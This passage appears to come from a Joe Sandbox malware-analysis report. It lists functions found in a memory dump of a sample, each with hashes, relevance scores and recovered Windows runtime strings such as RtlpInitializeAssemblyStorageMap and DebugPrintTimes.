                                                                                                  • API ID:
                                                                                                  • String ID: .Local\$@
                                                                                                  • API String ID: 0-380025441
                                                                                                  • Opcode ID: 16f608afc5a917e5fe842f057ad05b853ea5d56cd50ce01072a97f5e0996e538
                                                                                                  • Instruction ID: d583ade5e03bf91785e37406bba9e1e62f5846fd6e1cbe8310f2c9a27d157130
                                                                                                  • Opcode Fuzzy Hash: 16f608afc5a917e5fe842f057ad05b853ea5d56cd50ce01072a97f5e0996e538
                                                                                                  • Instruction Fuzzy Hash: 173181B5549341AFD311DF28C980A5BBBE8FBD5754F40092EF99483290D634DF09CBA2
                                                                                                  Function 325233D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 3256289A
                                                                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3256289F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                  • API String ID: 0-2653619699
                                                                                                  • Opcode ID: 171678032f521b9843682e15fa9ee20282853382833bac2d770d8d0f04e14079
                                                                                                  • Instruction ID: 3d2149a52a276430647e8904ea70c66e95f653eb1eb577fbec3d2d821b5d4cbf
                                                                                                  • Opcode Fuzzy Hash: 171678032f521b9843682e15fa9ee20282853382833bac2d770d8d0f04e14079
                                                                                                  • Instruction Fuzzy Hash: 8711E976B04305BFF7198A48CD45F6B7BA9DBD4758F60846AB904EB2C4DA78CF0086E0
                                                                                                  Function 3252A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                  • Opcode ID: c7095ef72371235fbaa0032e9c40604e655d9f39268ea004cd48b6b245dee086
                                                                                                  • Instruction ID: e2541139f1c8a06a801ad9dab5b81d665b726624dce7f623283d85b5632ae3f9
                                                                                                  • Opcode Fuzzy Hash: c7095ef72371235fbaa0032e9c40604e655d9f39268ea004cd48b6b245dee086
                                                                                                  • Instruction Fuzzy Hash: F201ADB2265740AFE711DF14CD05B1677E8EB80B1AF008979F658C75D0E734DA44CB45
                                                                                                  Function 324FC6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: MUI
                                                                                                  • API String ID: 0-1339004836
                                                                                                  • Opcode ID: d34eb7ab886f713b5f6886caf24f014061012ec2a3553cb8b6059c549483efcc
                                                                                                  • Instruction ID: 25865d889abbaa2582ba78abe2602d2fe2d37a2e8baa35b376894ad00220ba1a
                                                                                                  • Opcode Fuzzy Hash: d34eb7ab886f713b5f6886caf24f014061012ec2a3553cb8b6059c549483efcc
                                                                                                  • Instruction Fuzzy Hash: 50823979E00319EFEB14CFA9C980B9DB7B1FF88354F108169D859AB350DB729986CB50
                                                                                                  Function 324F64F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 16e7b09b03f9b85c5341bf02cf3d8f6f0c31bf4eb882d93a35774d569290c122
                                                                                                  • Instruction ID: 6937852144454f5d5720220c243e62c08ff207cab1729f4bfdd00b93ef00e86b
                                                                                                  • Opcode Fuzzy Hash: 16e7b09b03f9b85c5341bf02cf3d8f6f0c31bf4eb882d93a35774d569290c122
                                                                                                  • Instruction Fuzzy Hash: 97E17875609341DFD304CF28C490A5ABBE0FFC8348F548A6DE9A997351DB32E946CB92
                                                                                                  Function 3251B1E0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @[^2@[^2
                                                                                                  • API String ID: 0-2535103134
                                                                                                  • Opcode ID: bb4d54392d3421019fea4b589e6e7b2a4486cdc01d5bacc044f973ba8f3eb73a
                                                                                                  • Instruction ID: 0e19a073863669df3b68024d7396fbdded018134a44da403b63b65f3db56948b
                                                                                                  • Opcode Fuzzy Hash: bb4d54392d3421019fea4b589e6e7b2a4486cdc01d5bacc044f973ba8f3eb73a
                                                                                                  • Instruction Fuzzy Hash: DB32D5B5E11219DBEF18CF58D880BAEBBB1FF94744F550029E805AB350EB75AE11CB90
                                                                                                  Function 324F1051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: 314e909ffab14f20ffddb61761284d3e773b11b1e3daebe950a74a932b635999
                                                                                                  • Instruction ID: 495a3fdb42f7582eb53cda9e4724ce48521d3747105568aaf19dde78443eef25
                                                                                                  • Opcode Fuzzy Hash: 314e909ffab14f20ffddb61761284d3e773b11b1e3daebe950a74a932b635999
                                                                                                  • Instruction Fuzzy Hash: CCB123B56093809FD355CF28C980A6AFBF1BB88308F54496EF899C7351DB71E941CB82
                                                                                                  Function 324F7623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 89f25bf3591598091c4b3882c7ecf47379542e614c779434d95a32b0fd89c25f
                                                                                                  • Instruction ID: 969a153bcc51c178055c8419324b4f6448660e00cb85a299fb6ff1ad16e3bb0b
                                                                                                  • Opcode Fuzzy Hash: 89f25bf3591598091c4b3882c7ecf47379542e614c779434d95a32b0fd89c25f
                                                                                                  • Instruction Fuzzy Hash: 41615175A11606EFDB08CF68C980A9DFBB5BF88744F24816ED419A7340DB75AA42CF90
                                                                                                  Function 324F254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: f124713c0c15d80b8b9f63b1069edcdb7ea9050387381431606b426434c24360
                                                                                                  • Instruction ID: 24e9c6820d24aca09bf77a9e6f5b6f9a2b7a672f1b2e31f131433acc7276444e
                                                                                                  • Opcode Fuzzy Hash: f124713c0c15d80b8b9f63b1069edcdb7ea9050387381431606b426434c24360
                                                                                                  • Instruction Fuzzy Hash: 4E419DB5506704EFE315CF24C950B89B7F1FF84364F50869AD4169B2A0DB72AA81CF41
                                                                                                  Function 324F4779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: 1ba758fecadc54bbdbd582822e8adc6773cec3088d3d83396b93eabc62db6dea
                                                                                                  • Instruction ID: d6562f42d9bac11878df3867ada73ee8943143859664ecc22109360b790c6e5e
                                                                                                  • Opcode Fuzzy Hash: 1ba758fecadc54bbdbd582822e8adc6773cec3088d3d83396b93eabc62db6dea
                                                                                                  • Instruction Fuzzy Hash: CF41C2B8618381ABD314CF28E894B2ABBE5EFC1394F50442DEA41873A0DF72D941CA91
                                                                                                  Function 324EB420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: 75e40792bbdb27a56981c24d530ff1b054aba9ba538202f65d31005d9478df83
                                                                                                  • Instruction ID: 51b309e4ccdc7c9296495cef8ef93006fcbe75848c1320734fe843fe349debfa
                                                                                                  • Opcode Fuzzy Hash: 75e40792bbdb27a56981c24d530ff1b054aba9ba538202f65d31005d9478df83
                                                                                                  • Instruction Fuzzy Hash: 943121B2542208AFE311DF14C880A9A77A5FF84365F508669ED469B3A1CB31EE42CBD0
                                                                                                  Function 324F56E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: 084b8e50e86c07c95b73da2ab4f9ea0e7ef29d8d0f69d62e7b69ae3649e0e682
                                                                                                  • Instruction ID: 082a7a687b0bad4ef7ea0bf0b983e78c311d802fe5fd1e0e3baedf33c5cba05f
                                                                                                  • Opcode Fuzzy Hash: 084b8e50e86c07c95b73da2ab4f9ea0e7ef29d8d0f69d62e7b69ae3649e0e682
                                                                                                  • Instruction Fuzzy Hash: 6931AC3A611A15FFE7558B64CA80A8ABBA5FFC8350F90505AEC0187E50DB72E971CF80
                                                                                                  Function 3259E750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: 2e90e5108fd5a8861f41b893c51f8ba4e16a9c855cb0da75dedbcb08f18329c2
                                                                                                  • Instruction ID: 968be19511f69e3e6d68b556f02d7b6f7ad76bcde42100dcd7aad5272aa9605c
                                                                                                  • Opcode Fuzzy Hash: 2e90e5108fd5a8861f41b893c51f8ba4e16a9c855cb0da75dedbcb08f18329c2
                                                                                                  • Instruction Fuzzy Hash: AC3178B55453019FC700DF19C54099ABFE1FF893A8F4499AEE8889B211E731DB05CF92
                                                                                                  Function 3257A130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: b9352de590c0e7c3c7e852f3b0b3b9b3e94588e846b771db1d5088135eb2abba
                                                                                                  • Instruction ID: d2002915c126f1f0c63e55e50e64ea6ed436e867c3f1e4b5af1da8c431dbf5c5
                                                                                                  • Opcode Fuzzy Hash: b9352de590c0e7c3c7e852f3b0b3b9b3e94588e846b771db1d5088135eb2abba
                                                                                                  • Instruction Fuzzy Hash: 0F014936151259ABEF029F84C840EDA3F66FF4C754F058515FE1866224C736DA71EB80
                                                                                                  Function 324E92AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: 6ad237f474aec537a5908c74045b6a330417ebacd9112f8d863104618f9f8912
                                                                                                  • Instruction ID: 66eddfa35c0193fd385560afa0d0f6573d924b4661c90926cbaa5caa8a70d2fb
                                                                                                  • Opcode Fuzzy Hash: 6ad237f474aec537a5908c74045b6a330417ebacd9112f8d863104618f9f8912
                                                                                                  • Instruction Fuzzy Hash: 22F0F032100700BBE7319B08CC04F8ABBEDEF84700F04051CA982931D0C7A0E905C650
                                                                                                  Function 324F965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                  • Instruction ID: c73652192a4680798192f37908f79e1f7e7a432c13309365c93098871def9e12
                                                                                                  • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                  • Instruction Fuzzy Hash: 406167B5D01719EBEB11DFA9C840BDEBBF4EF84754F20452AE810A7250DBB58E41CBA0
                                                                                                  Function 325002F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #%u
                                                                                                  • API String ID: 0-232158463
                                                                                                  • Opcode ID: 3b228e3992b8b3819ecc898a3e76b68ed111930604ef4a1ab5bfc1a65150155a
                                                                                                  • Instruction ID: f5ef84dc121214b89855bf773a6427105f984dc4722894b9dcd9f2c881a2a000
                                                                                                  • Opcode Fuzzy Hash: 3b228e3992b8b3819ecc898a3e76b68ed111930604ef4a1ab5bfc1a65150155a
                                                                                                  • Instruction Fuzzy Hash: A8714B76A00249DFDB05CFA9C980BAEBBF8FF48744F144066E905E7251EB74EA41CB60
                                                                                                  Function 3257F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                  • Instruction ID: b736a3887d1c00d9ce3e2b1e340635349a9d3c836be7edc24f7f801932010c9a
                                                                                                  • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                  • Instruction Fuzzy Hash: 4B518AB2545741AFE722CE18C940F6ABBE8FF84754F804929B650D7290DBB5EE04CB91
                                                                                                  Function 325B86A8 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0h^2
                                                                                                  • API String ID: 0-2068094079
                                                                                                  • Opcode ID: 9a93aaca4c3f07bb062aac1e591e401b63de54177ab8f5015029563fefe7b41e
                                                                                                  • Instruction ID: 53903eba97b48a721903b3577d7d5bc500593f1c466811b621479cec39898fb1
                                                                                                  • Opcode Fuzzy Hash: 9a93aaca4c3f07bb062aac1e591e401b63de54177ab8f5015029563fefe7b41e
                                                                                                  • Instruction Fuzzy Hash: 314116B47006109BDF15CB29D898B6BBB9AEFC07A8F909619FC1587680DF75DB01C790
                                                                                                  Function 325241BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                  • Instruction ID: 9528e5ba6981ac075a60b9921bb76349f58eb686bd6ac3f17707deada8eaf1e3
                                                                                                  • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                  • Instruction Fuzzy Hash: AD517B71505710AFD321CF59C841A6BBBF8FF88714F40892EFA95976A0E7B4DA04CB91
                                                                                                  Function 3256C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryHash
                                                                                                  • API String ID: 0-2202222882
                                                                                                  • Opcode ID: 6d6cd3ffa1d9251add0f7a854cc6736a10fe1ab509e7098928f89ee8edc82112
                                                                                                  • Instruction ID: 27cd94700ddaf6dc741d3a34bfddca6a5b99350285fe614f799ed57d27d25278
                                                                                                  • Opcode Fuzzy Hash: 6d6cd3ffa1d9251add0f7a854cc6736a10fe1ab509e7098928f89ee8edc82112
                                                                                                  • Instruction Fuzzy Hash: BA4177B190152DAFDB21DA50DC84FEE777CAB44719F4055E5EB08A7140DB709F888FA4
                                                                                                  Function 32579429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: verifier.dll
                                                                                                  • API String ID: 0-3265496382
                                                                                                  • Opcode ID: 90688a30c765e40d3e5a280143ec21281066bf1330cad8ffbbb22d097ee1004b
                                                                                                  • Instruction ID: 063e8987171446c780e2934e4941ba5d29e0ef63d5d0f7c1eb384aa38592eaf0
                                                                                                  • Opcode Fuzzy Hash: 90688a30c765e40d3e5a280143ec21281066bf1330cad8ffbbb22d097ee1004b
                                                                                                  • Instruction Fuzzy Hash: 7931C2B66902119FE7158F1D9850B6677E6EF88354F90843AEA09DF381EB71CF818760
                                                                                                  Function 32527425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #
                                                                                                  • API String ID: 0-1885708031
                                                                                                  • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                  • Instruction ID: 107de4b00c4c1edb44a6dc64492d5733ebc1f39805a8f985ec1df6d8314e9b38
                                                                                                  • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                  • Instruction Fuzzy Hash: 9C41BD75A00719DFDB25CF88C880BBEBBB4EF80706F40445AE941A7280DB349A41CBD1
                                                                                                  Function 3252360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
